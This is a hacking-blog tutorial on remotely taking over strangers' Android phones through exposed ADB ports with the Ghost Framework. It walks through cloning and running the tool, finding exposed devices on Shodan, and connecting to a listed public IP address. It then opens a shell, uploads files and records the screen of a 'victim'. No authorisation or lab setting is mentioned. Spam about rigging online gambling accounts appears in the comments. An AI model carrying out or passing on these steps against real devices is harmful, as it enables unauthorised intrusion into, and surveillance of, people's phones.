Sponsored
Andorid Hacking

Access Any Android Phone Without Touching – Ghost Framework

In this article, we will going to talk about how to access any android device. There will be many ways to access the android phone but in this method you can access android device without touching the phone.

Lets take a look !

What is Android Debug Bridge (ADB) ?

Android debug Bridge (ADB) is a command line tool which is help to communicate with another device.It is provide command line interface to control your android device. Mostly people using to adb for transfering the files between computer to android device, hence the 5555 port are opened in most of the android device.

Requirements

Kali Linux – Attacker
Android Device – Victim

Lets Begin !!
Source – https://github.com/entynetproject/ghost

Ghost Framework is a android post-exploit framework that exploit the ADB to remotely access any android smartphone.

We need to go on github account for cloning this repository. After that Fire up kali linux, navigate on desktop and clone this repo by using following command.

git clone https://github.com/entynetproject/ghost.git

A new directory will be created on your terminal. So we need to go the ghost directory by following command.

cd ghost

Before starting the script we need to give the permission to installer script by using following command.

chmod +x install.sh

we can run the installer file by using following command.

./install

It takes few minutes to start.

Now, we ready to launch this tool, Lets start by using following command.

./ghost

After the tool starts you can use help command for usage guide of this tool.

help

We should have public IP address and adb port of victim in order to access android device. We have to go www.shodan.io website and type android debug bridge so that the people whose public IP address and adb open can be know about that.

You can observe shodan provides 21 thousand results in which the people whose adb function are enabled in their smartphone.
Go back on kali terminal and try to connect with victim by using following command.

connect 113.54.205.200:5555

You can observe we have connected successfully to the victim. if you want to check what can you do, so you can run help command.

help

After connect you can gather lot of information such as :

apps
upload

You can control the device by terminal using following command.

shell
wifi on / off

You can record the screen of victim by following command.

screenrec /root/

Just like that ! you can perform multiple attacks on victim smartphone.

Sponsored

View Comments

  • ID PRO is a special account that is often used as
    accounts that can get wins consistently with each other
    by manipulating the existing system in an online gambling agent.

  • Thank you for the auspicious writeup. It in fact was a amusement account it. Look advanced to more added agreeable from you! However, how could we communicate?

Recent Posts

Termux Cheat Sheet for Hackers

Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…

1 month ago

Cracking the X-Factor in Cybersecurity: How Humans are Protecting the Systems?

Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…

8 months ago

Cariddi – Hidden Endpoint Finder for Bug Hunting

Hey Folks, we are back today after such a long break, but don't worry we…

2 years ago

API Security Testing 101: Know Everything About API Security Testing!

The security of your API should be one of the top priorities of companies. Without…

2 years ago

7 Best Tools for Web Penetration Testing: Comprehensive Details

Hey Folks, In today's business world, it is essential to have an online presence. However,…

2 years ago

Cyber Security Audits: Everything You Need to Know About It

Hey Folks, Is your business prepared in case of a cyber attack? Many companies don't…

2 years ago
Sponsored

This website uses cookies.